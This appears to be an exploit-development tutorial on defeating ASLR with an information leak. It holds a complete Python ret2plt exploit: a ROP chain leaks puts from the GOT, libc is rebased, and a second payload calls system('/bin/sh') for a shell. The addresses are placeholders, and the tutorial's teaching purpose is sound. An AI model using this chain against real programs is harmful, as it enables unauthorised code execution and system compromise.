Exploit Dev — Info Leaks

Every chain so far hardcoded addresses, which only works with ASLR off. This is the keystone that makes the technique work on a real target: leak one true runtime address and derive the rest from it. Because the offsets between symbols inside a module are fixed for a given build, one leaked libc address gives you libc's base, and from the base any other libc address you want, provided your symbol offsets come from the same libc build the target loads. We build the classic ret2plt leak, calling puts@plt with the GOT entry of puts as its argument so the program prints the resolved runtime address of puts (which the GOT holds only once the dynamic linker has bound puts, so under lazy binding the program must have called puts at least once before the leak), rebase libc from that value, and chain it into a two-stage ex
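The leak and rebase steps described above, as an added example that is not code from the original page. The binary addresses (`PUTS_PLT`, `PUTS_GOT`, `MAIN`, the gadgets, the overflow offset) and the libc symbol offsets are constructed placeholders standing in for values you would read with `objdump -d`, `readelf -r`, `ropper`/`ROPgadget` and `readelf -s libc.so.6`; the constructed `puts` output line plays the part of what the target prints. The example assumes a no-PIE x86-64 binary, so the PLT/GOT/gadget addresses are static and only libc needs rebasing.

```python
import struct

# Constructed values for an assumed no-PIE x86-64 target (not from the page).
PUTS_PLT = 0x401030       # puts@plt stub
PUTS_GOT = 0x404018       # GOT slot holding the resolved address of puts
MAIN = 0x401136           # return here after the leak to get a second overflow
POP_RDI_RET = 0x4011bb    # gadget: pop rdi ; ret
RET = 0x40101a            # gadget: ret (for 16-byte stack alignment)
OFFSET_TO_RET = 40        # bytes from buffer start to the saved return address

# Assumed symbol offsets within the target's libc build (readelf -s style).
# They must come from the exact libc the target loads; a different build
# gives a wrong base, which the alignment check below usually catches.
LIBC_SYMS = {"puts": 0x80E50, "system": 0x50D70, "str_bin_sh": 0x1D8678}


def p64(value: int) -> bytes:
    """Pack a 64-bit little-endian pointer the way it sits on the stack."""
    return struct.pack("<Q", value)


def stage1_payload() -> bytes:
    """ret2plt leak: puts(puts@got) prints the runtime address of puts,
    then return into main so the program runs the overflow a second time."""
    return (
        b"A" * OFFSET_TO_RET
        + p64(POP_RDI_RET)
        + p64(PUTS_GOT)   # rdi = &GOT[puts]; puts reads the pointer stored there
        + p64(PUTS_PLT)   # call puts through the PLT
        + p64(MAIN)       # second pass with addresses now known
    )


def parse_leak(line: bytes) -> int:
    """Turn the line puts printed into an integer address.

    puts stops at the first NUL byte, and a canonical user-space address has
    two leading zero bytes, so normally exactly 6 bytes arrive followed by the
    newline puts appends. Pad back to 8 bytes before unpacking."""
    if line.endswith(b"\n"):
        line = line[:-1]        # strip only the newline puts added, nothing else
    if not 1 <= len(line) <= 8:
        raise ValueError(f"leak has unexpected length {len(line)}: {line!r}")
    return struct.unpack("<Q", line.ljust(8, b"\x00"))[0]


def rebase(leaked_puts: int) -> int:
    """libc base = leaked runtime address - offset of that symbol in libc."""
    base = leaked_puts - LIBC_SYMS["puts"]
    # The mapping base is page aligned; a misaligned result means the leak was
    # garbled or the symbol offsets belong to a different libc build.
    if base & 0xFFF:
        raise ValueError(f"libc base {base:#x} is not page aligned; wrong libc?")
    return base


def stage2_payload(libc_base: int) -> bytes:
    """Second overflow: system("/bin/sh") using rebased libc addresses."""
    system = libc_base + LIBC_SYMS["system"]
    binsh = libc_base + LIBC_SYMS["str_bin_sh"]
    return (
        b"A" * OFFSET_TO_RET
        + p64(RET)            # realign rsp to 16 bytes before the call into system
        + p64(POP_RDI_RET)
        + p64(binsh)          # rdi = "/bin/sh"
        + p64(system)
    )


if __name__ == "__main__":
    # Constructed stand-in for the target's output after stage 1: the 6
    # significant bytes of 0x7ffff7e50e50 followed by the newline from puts.
    leaked_line = b"\x50\x0e\xe5\xf7\xff\x7f\n"
    puts_addr = parse_leak(leaked_line)
    base = rebase(puts_addr)
    print(f"puts @ {puts_addr:#x} -> libc base {base:#x}")
    print(f"stage 1: {stage1_payload().hex()}")
    print(f"stage 2: {stage2_payload(base).hex()}")
```

In a live run the two payloads go to the target on successive passes: send `stage1_payload()`, read back the line the leaked `puts` produced, feed it to `parse_leak` and `rebase`, then send `stage2_payload(base)` to the second instance of the overflow. If `rebase` raises, check the libc build before anything else; the most common cause of a "correct" chain that still crashes is symbol offsets taken from a libc other than the one the target actually maps.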
